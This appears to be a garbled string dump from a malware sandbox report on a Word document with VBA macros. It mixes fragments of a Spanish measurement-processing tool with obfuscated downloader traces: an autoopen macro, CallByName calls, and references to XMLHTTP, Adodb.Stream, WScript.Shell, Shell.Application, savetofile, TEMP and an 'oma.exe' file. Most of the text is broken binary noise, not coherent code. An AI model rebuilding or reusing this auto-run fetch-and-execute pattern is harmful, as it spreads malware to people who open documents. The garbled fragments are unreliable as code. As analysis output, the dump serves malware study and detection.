Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

BaseClass=UserForm1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

BE`xpose0TemplateDerivCus tomizDQ0*pHdProjectQ(@=

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

BExposeTemplateDeriv$CustomizC1Sub autoopen()

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHayCTruevP roc(8ECh eckedTH ETA_CCNZZs<oD.ch&8PHv+9X9+10V+@ENTRARXSelect BnPrefSI:11&LpANONUncKzElsCCGrayEnd &I2BB2nERDYGAN3

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHayEXPAND;0bHaySFIFT`0bHayCNIFTo0bHayPNIFT0bHayPNIFU0bHayFrecs"&0perdH0sProcpJ0Uncheckedm0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHayNORMAC0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHaySNIFTDy0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHayTruesProc(7hecked

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

c t0E_2, mata(11VbMethod,Z5, 2

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

C3boTExcitacion.Td s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CadenaiAAux-lBooleaA= On Error GoTo Manipuxlar4$fI86lOpen ;FInpLutA#Do

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CallByName un

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CallByName0VbLetA0chkCPEF0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Caption = "UserForm1"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CAPU FrecsGo]pA*i0sProc) Step 1(i)Unch`eckedBxi0CharSinj3_.$_"I.&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CAPUFrecsGoTo perd4or i0 UBound(sa) St0ep 1(i)UncheckeNext

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CargarFichIncer "@"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CargarFichPr oc "/End

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Case ClaveTHETA_UL6rExjeDat.oIzqda(CadenavS

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Case PrefSONDA_1HsSNIFTD_E.XPAND(15) = ClaveHn2!n$73!7$End Sele4ct16oD.ch`FIN_o,hEs+NINI_SF

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CharSinCargarQ0sSNIFTD_EXPAND0sSNIFTD_E0XPAND&0sSFIFT90sSFf0IFT0sCNIFTG0sCN0sPNIFT0sPN0sPNIFU0sPNIf0FUH]0ManipularErrorCargarProc(0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

chkFresnelo0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveCNIFT0chkCPPF0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveIPOLD0SalirGuardarNORMA0Documentj0xS6020430-C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveLFI900ClaveGSonda0ClaveCSondaj0ClaveFIN_SFIFT0ClaveINI_CNIFT

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveOUTSONDAt0ClaveFIN_SNIFTD0ClaveFIN_EXPAND,j0ClaveINI_SFIFT50ClaveR0K0ClaveLFI00

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePERDYGAN*q0ClaveFSONDA0ClaveFIN_CNIFT0ClaveINI_PNIFTa0ClaveTHETA_PX0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePHI_C]f0ClaveCENTRAR_CA0PrefSIY0PrefNO0Grayed0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePHI_Pjf0ClaveFICHRNFOs0ClaveFICHPRB-i0ClaveFICHREFr0ClavePERDINS0ClaveFIN_PNIFT{0ClaveINI_PNIFUa0ClaveCENTGIRAR_UI0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePHI_Uof0ClaveFACTEXP0ClaveFINV0ClaveFIN_PNIFU|0EOF0Split)0UserForm1)0ComboBox1'0perd10MsgBoxR0vbOKOnly0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePNIFT0chkCoordP0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePNIFU0GuardarFichProc0SalirGuardarProc60sPathProceso 0frmProcesado0cboTExcitacion0rbp0VbGet0VbMethod0perd90chkNORMA0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveSFIFT>0chkCPCF0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClaveTRANSF_U'0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClientHeight = VBFrame^#PROJECTwmc_PROJECTeCompObjnq 3180

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClientLeft = 45

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClientTop = 375

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClientWidth = 4710

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CMG="1517E4771CF220F220F220F220"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CPXGIqX?XpwX .FU(7<gXI!IOXt@"9sbhhpNSF_=&NCAMBIeD2:NSIFCO/'fRCMPTE-PXY(BAAEo`bFTHPHo`RHLaEMEMFORMA~T))_1(SI234E.RW?hV'bO.L.1.U/J%z(sUbR

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ctE_1 As ObjecJt|2>3 @4Sng`56Const STILL_A CTIVE&H103

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

D@im unc@t`E_7() As Varian@@dMAr(10074, )86228i177#69b817j1$5C023277D%D#E9C7191.O@pen mata(5), AddFieldToM(29`Fa/GoTo ,be12_N1QN2MdERDYGANB^3ee__F~9r]`NQPNWqs>PXP]PR@_PveuSPPPSP@asyv@U;_Pj(1-PP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

dGlobalSpaco FalseCr@eatablPredeclaDIdTru

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Dim mandata()-PROCESS_QUERY_INFORM ATION$400USub CargarFichProc(Nombreero1P)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Document=ThisDocument/&H00000000

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

DPB="949665F89B769C769C76"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ElsN|perd1: ~CallByName unc@t`E_2, mandata(7), VbLe3@CPEAsteriscos &, _INI_"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

End If Print #f, Clav eFIN_FU, vbNewLine\:Close perdD3:"unctE_2.OpenGuardarFichProc ""

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

End Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

eoX{ThisDocument07586f65e4ThisDocument~0Module102586f65e3Module1, UserForm103586f65e3SUserForm1h

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Exit Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ExtraeDato0DchaC0ExtraeDatoIe0zqda0CharLineaVaciac0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

F Microsoft Office Word

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f":_+<:_;Q:_aOn } ypf $Fre l! KHputeDAMA,+txtQ2luW@NOFREClst`cuencias.ListCoun` A<0 0OC - 1ep i""_](iQ < iy]chTkN"ACI DWAsteriscos4:6qTEXCIT, hCS7COMP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b f%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b f%b f%b `k0 !! ~ ~ ~ ~ j%b j%b j%b j%b j%b j%b j%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b f%b f%b `k86 !! ~ ~ ~ ~ j%b j%b j%b j%b j%b j%b j%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f,b 6 % f,b f%b % f,b KT 6 f,b KT KT'J +R KT 6 % j,b j%b % j,b 6 % j,b j%b % j,b KT 6 % j,b j%b % j,b 6 % j,b j%b % j,b KT 6 j,b j%b j,bd T j,bk KT 6 j,b KT 6 j,b j%b j,bd T j,bk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f,b 6 % f,b f%b % f,b KT 6 f,b KT KT'J +R KT 6 % j,b j%b % j,b 6 % j,b j%b % j,b KT 6 % j,b j%b % j,b 6 % j,b j%b % j,b KT 6 j,b j%b j,bdh T j,bkH KT 6 j,b KT 6 j,b j%b j,bd T j,bk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f,b KT 6 % KT f,b KT T f,bS f,bnh 6 % f,b f%b % f,b KT 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f,b KT 6 % KT f,b KT T f,bS0 f,bn]$. $j B@'Z'f'f'b','!'!'\'\'U'a'^'^' '['`'!'''('Y'X'!'Y'''&''' 'W'j'W'D'*' 6 % f,b f%b % f,b KT 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

F.@bR5IICN_ s1^1&?P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Fall?Boolea&n*= sebHayN65CSNIFTDEXPAN

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FFFFFFF$""

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FFnFnnnF:s`Z"P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

fG"2_[425<25L On Error GoTo ManipularGuardarProc

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FichConfig}0EXTin0TExcit0ManipularErrorGuardarNORMA<0uTMedida0Iniciales40Ini_CLBn0Ext_CCL60Ext_CCP:0Ext_CIN0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FICHERO_INCER ` !! 8 !! 8 !% 8 ` ! S/N_RUIDO !!dk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FICHERO_INCERKT 6' KT 6 % %$': :

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FORM"Mp

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FORMFe_

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

G51[3_TK]6_c(X6]SOND4'.o't1Qr_o

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

G\GATru2lsaFa3&?~8yby?r#(9~ybyKTprpQ`_+1&wtUAbAo_A_A_Aao`_ArZAa@@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

GC="1311E27D607E607E9F"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

gjhCElse#EXPAN~C&Seln Caa$cbo9J.Tdb!LINX@IO= Pref"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

gModule1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

gPub(licm (N`ombreXAPs Stg%Dim f I^ger]ixCPE

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

h Nh"h$h&h(h*H,L .H0L8(i2``4`6`8`:`<+jH)lhin`p`rhTi2``4`6`8`:`< @i2`X`8`<`B`H`N` R` 8``` X` 8`8`,\` ^` 8 i28`,b`8 h` 8`8`,b`,b` l` 8`8`,p`'`` t` x`K `T.X%i2N`8823i28`8KT6

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

h@%%% @@x@peoX$*\Rffff*07586f65e44"(/A@o`XAttribute VB_Name = "ThisDocument"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

HelpContextID="0"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

hU,1h. A!"R#n$n%B@B1KG=K9CJ_HaJmHsHtHBABA=>2=>9 H@8DB 0170F0XiX1KG=0O B01;8F04

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

i0CharXSint3FQI_E .L#

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

I8NI_}TExcitacionNInSond"aOutTPorizNTNolrm@OFCArrar_cUG

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

i`07KC6AM

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

iHZ,` `8`J`L

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

INCERathMedidaaClaveNOFREC 1`]ix(VaDl(NLe.sn(

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

INI_o`%5)V|C`^xT0Z6_tc(X6#@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

INSONDA, InSo9sSN D_E.XPAND(8!"ROUT,

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

iuTransSGmpte_GoTo @VIf frmAesado.optSNIFTD@.ValueTrThBg=C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

j% KT ' TKT 'n j% KT ' KT 'n j% KT ' $KT "' (KT &' ,KT *' 0KT .'n8 j% 6KT 4' :KT 8' >KT <' BKT @'n ' 2 FICHERO_MED !!d `

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

j%b `k !! ~ ~ ~ ~ n%p 2 n%p D n%p n%p F n%pkx H n%p

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

j%b `k4 !! ~ ~ ~ ~ n%p 2 n%p D n%p n%p F n%pk3 H n%p

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

KEc"P`xINSBWE(2"N_ehU aU]4SY

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

KT 6 % j,b j%b % j,b KT KT'L

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

l4a.k.

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

leoXJ<

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Line #f, C;7= ExtraeDatoD.cha(CL@SelectWseG.oIzqdCaClaveNOFREC#D:ix((S inLe.@s()t!p>= 1Is";DsMax sLimi,in,ax

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

lnln,FFnFFFFFd

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Manipula rErro

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Manipular0Erro\yNo existe Pel fs 0s@t? da?

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ManipularErromi@MsgBo@x("No p udo g el fichero correctp

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ManipularErroNo existe el fic hero `st? da?@"&`NewLine &

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

mataSplit(UserForm1.ComboBox1.T@ext, NrHeFiProGoTo QQ7pwEiMsg("Se han ignorado algunas en@das, comppbe lanfiguraci?n", _4vbOKOnly + vbInf

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Microsoft Corporation'

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Microsoft Forms 2.0 FormEmbedded Object9qVERSION 5.00

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

mKZEFV\$9-%TEMP%\VBE\MSForms.exd

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Module1=150, 150, 1498, 570, Z

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Module=Module1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

MopD.chL&L7LPHI

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

MSWordDocWord.Document.89q

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n%p %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n%pk0 L `k J V "B@A@|

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n%pk83 L `k3 J V$2 "$. " (A@2|22

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n,p JKT LKTS0'<n $N VP R!T!d 2$P'.V

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n0nlZ

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

N6)%7

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Name="Project"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NewLi ne & @.DescripCriticalERRORResume N

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NH* P!R T V'Jd(* X'Jk* 4 KT 'L KT 'L KT 'Ln) ' H Z | L \ V^`)|X)NP),No se pudo guardar el fichero correctamente. ` H Z ` b!d Z fERROR NORMA$X'8(o((Attribute VB_Name = "Module1"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NN0NHNXNpNNNNNNNNNOOOO O8OPOXO`OhOpOOOOOOO"OOO$OPP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NombreFichero\0Buffer-0Cadena;0i`0Auxu0Fallo,0bHayNORMAZ0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

nte."sPathovbOKO nly +Critical, "ERROR PROCESADO DE D%S"!1<ResuNe0xt

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Num_simulac`e1yAo2`@O`n Err`yb{Manip`rbqazrflbYInpf@DoLine #f, #d= ExtraeDatoD.0cha(#Selectse@.oIzqdiCa"", " @q1aVaAsteriscos &X"FICHEROp_MED.L(&s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NumSimul6%NO_SIMUL5"Ohres.chk7o.ValueChepckedyA7ay"cai

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

o` i r(4)or

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

OOK.1 p!Jj??6, S;]80cwROU#9eTHETA_SEp?p(1uLPHIND(13P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

P cM65?e8optfbHay#s?6p6P#`7}P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

p }t 0ho(UserForm1 q`Z q`ZfW^oXCompObj\aAEH,z*-Microsoft.XMLHTTP/Adodb.Stream/Shell.Application/WScript.Shell/Process/GET/TEMP/Type/Open/write/responseBody/savetofile/

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

P0<INS0+_cz/$(nN_2WU4UU]4oo4venGInnpn .FU(7<nIInt9Zbt/NSF_=&NCAMBI"|2:SIFCO/'i}CRCMPTE-PXY>yAEobFTxHPHo`R<HLEM|EMFORMAT))cSIaB

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

p9() As Variapnt, 36E_10Integer&Stri ng

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

P`pBx8

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

perd1:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

perd4unc@t`E_5/.@4%"\!oma.exe_GuardarF!! "=!PublicA# (NoAs String-Dim f @Integer,!i/b)CPEINI_=mC,TE0xcit9^In Sonda~OuFt!TPo!iRzTN'l FCR.r_cGirar_uTransmp(VTLGoTo 09yyoptSNtDG?uJ=0?QGANT

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

piIncer(N@ombreF

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefCONCAMBIOM0ClaveCONCAMBIO0ClaveCMPTE_U0PrefCPXY|0ClaveCPXYx0PrefAE0ClaveAE_I0PrefTHPH0ClaveTHPH0PrefRHLH0ClaveRHLH.0PrefEMEM0ClaveEMEM>0ClaveFORMATOr

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefFORM_10ClaveFORM_1m0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefFORM_20ClaveFORM_2n0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefFORM_30ClaveFORM_3o0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefFORM_40ClaveFORM_4p0ClaveTHETA_U]0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefSINCAMBIO0ClaveSINCAMBIOWX0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Project.ThisDocument.autoopenPROJECT.THISDOCUMENT.AUTOOPEN@TM`@UnknownG:AxTimes New Roman5Symbol3&:CxArial"hiAiAnr4C!='3HP)?U2Microsoft OfficeMicrosoft OfficeOh+'0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Public Cargar@|cs(NombreFichero As String Dim fIn`teger@pB`uffer

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Public F:ion AddFieldTo

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Public un

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Q!HNextoV =Gxu!FySub L(N ombreAero]AmfuBuff@gCadenaGEDiAuxFallBoolean= sebHayS`NIFTD;EXPAN

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Q,Ca(1)62hokuk_S3?E_3R.Environmentf4!Vq2(rTEX8CIT i,$PrefLINX@|c(nQ#ddYoe`afCIR&d"B52

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

qkFSbHLYBVHgM.[~^JL,BMPDocumentautoopen

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

QyL-[DRE%PROGRAMFILES%\(x86)\Common Files\Microsoft Shared\OFFICE11\MSO.DLLOffice

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

R0SF. (3MsSinLe.9s(MLF:I/4$/4)9)5GSonda_GnG6C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

R5I$CN_ s11/&?P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

rFACTE~XDyRA[l[NICWs(I!r%1P FQRtTFallo7`%Loop Until EOF(flowperd:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

RPuPblic

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

rstdole>stdoleP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

rU0Y4a[0__SRP_2__SRP_3

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

s4m7aDOUI.FU=3`2On Err@BSManipularbIR] JfPZlApO0pen K2In(putazf@DoALine #8f, c= ExtraeDato.Dcha(c#SelseI.zqdCa"", " SaaVacia

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Sa8lir<Exit Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

SalirGuardar~P Exit Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

SDuqSgh

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

SONDA A0D4`r_b\~rk7lso= h3oa17

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

SONDA_1aCm2tm3tm4tm5ts?!$!15U!!

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

sProc(6) = frm`esado.optEXPAND.ValuebHayH7chkFresnelIfZChecked ThenA_SFIFT^TbrrElsyFaEnd If~8~CPCz)zCN==9=P==P==10=oord>?U]A_Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

sSF.IFT(5) = SinLe.tras(Case ClaveGSondJa6pExheDat.oIzqda(CadN6)`C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

sSNIFTD_E.XPAND(16)TPriFIN_CPE, vbN@ewLineFE nd IfIf frmProcesado.chkFresnel.Value = Checked` Then1^Asteriscops &

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

StartUpPosition = 1 'CenterOwner

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

THETA_SE(,A!>vE$2a.to<E]&F[)dPHI(1H-?&/rD.r7"948@!O>|O>l7O>D(1K\]_>f#_>_o>_o>B>TDwP}oB"\-,HVwac!cEj]OOseR K(sSxu.LFIO%a$-$9O+adena)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

THETA_SE(QVA!>9J$R?2d1|_EiPHp8D(1rANBx9RT{!1@!I>ExtraeDat.oIzqda(Cadena)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ThisDocument=200, 200, 1548, 620,

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ThisDocumentThisDocumentModule1Module1UserForm1UserForm1ID="{7DE7D2EF-3048-46DF-83F3-B33C701AB187}"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

TTTTTTTTrTHUPU"XU`UhUpUxUUUUUUUUUUUUUUUUVV(V8VPV`VhVpVxV VWW W] ] ] D0] H] `] x]$]]$]X]p]]]]'<'>'@'B'D'F'H'J'L'NP 8 R T 8+R 8 V+R V+R 8 X V 8 Z,\ 8 T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

TuTogSBFqD0(5)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

txtNivelRuidod0txtDrift0txtDriftMod>J0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

TypeInfoVer = 1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

unctE_6.Ope8n (0L5)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctunc2_10ChrK~0Pot_ruido30Drift0DriftMod0LeakageM0CablesJuntas0CablesJuntasModj0Dut0Sgh0Cables0Num_simulaciones\0Junto2<0Junto+0sPathMedida`0sPr0oc10CreateObject0hokuk40Environment50perd20

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_1A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_2A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_3A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_4A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_5A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_6A0STILL_ACTIVE0mandatac=0PROCESS_QUERY_INFORMATION=0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_7A0perd30Send0perd40frmAnalisisIncertidumbres0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_8A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_9A0uncunctuncE_10Ws0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

UserForm1=0, 0, 0, 0, C, 175, 175, 1523, 595,

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

vbCritical+}0CargarFichIncer0AddFieldToField0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

vbInformationn0SalirCargarProc50vbNewLine0Erro0Description 0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

VersionCompatible32="393222000"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

X+002pSQfWordS10VBA0Win160Win320Mac0VBA6#0Project-0stdole`0Normal0Officeu0MSFormsC0ThisDocument<0_Evaluate0autoopen*0CargarFichProc00Module1b0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Xdlt|Microsoft OfficeNormal.dotMicrosoft Office2Microsoft Office Word@F#@`Z@`Z.+,0hp

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Xh$0@Hhx&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Xh$8H`&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

xME 8@X`&(Ph&&&8`hx 08&X&&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ Z%\

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ Z%\ Z%\ `k !! ~ ~ ~ ~ `%b `%b `%b `%b `%b `k !! ~ ~

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ Z%\ Z%\ `k8 !! ~ ~ ~ ~ `%b `%b `%b `%b `%b `k7 !! ~ ~

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\ 8 ^ V 8 `,b 8 8 d V 8 f,b 8 T f,b 8 h V 8 j,b 8 T j,b T j,b 8 l V 8 n,p 8 T n,p V'v V'x V'z V'| V'~ V' V' V' V' V' T' V'r ' 2 _ 4 4 %'6 4 %K K |KT ~ ~KTFICHERO_MEDKT 6+R

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\ 8 ^ V 8 `,b 8 8 d V 8 f,b 8 T f,b 8 h V 8 j,b 8 T j,b T j,b 8 l V 8 n,p 8 T n,pr ' 2 _ 4 4 t%v'6 4 x%zK K |KT ~ ~KT KT 6+R KT 6 % %$': :

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\d T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\d T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\k KT 6 % Z,\ Z%\ % Z,\ 6 %'6 6 % Z,\ Z%\ % Z,\ KT 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Zs4m7d"(IFUI.<FU=3`2Pot_ruidoLA:DriftModPLeakage0CablesJuntaabm

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

{, xME

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

~ ~ f%b f%b f%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

/SOURCE 1 /LCID 1031 /WAITPID 2676

Ansi based on Process Commandline (OffDiag.exe)

+,$-.0

